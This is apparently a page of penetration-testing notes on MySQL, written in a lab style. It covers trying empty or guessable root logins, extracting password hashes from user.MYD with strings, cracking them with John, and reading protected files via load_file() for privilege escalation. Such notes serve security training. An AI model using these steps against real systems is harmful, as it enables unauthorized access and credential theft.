MySql

Easy to Try

  • Sometimes people leave NO password or easy to guess.

su mysql        .. sometimes an actual user
mysql -u root   .. see if you can get into mysql easily
                .. easy guess 'mysql' password!!

Navigate

show databases;
use [DATABASE];
show tables;
select * from [TABLE];

Strings MYD

> strings /var/lib/mysql/mysql/user.MYD   ..might get you a password 

localhost
root*D3240DFEFEDF838952C03D28
6c732c6044b7
root 127.0.0.1
root localhost
debian-sys-maint*D1461CE757B9B67AC344204A3A7FE9F9DB17A35C
68B0F4D12A2A1885

..
Stitch the two together:
root:*D3240DFEFEDF838952C03D2868B0F4D12A2A1885

john ./lab.txt
root18  ..cracked!

PrivEsc

Privesc to read a file you shouldnt have access to!
Some of this is locked down in later releases of mysql, but worth checking!!

>> mysql -u root
>> select load_file('/var/lib/mysql-files/key.txt');
+-------------------------------------------+
| load_file('/var/lib/mysql-files/key.txt') |
+-------------------------------------------+
| 4234db90-01c6-4f10-8c81-8c0017107fc7
PreviousMetasploitNextNFS

Last updated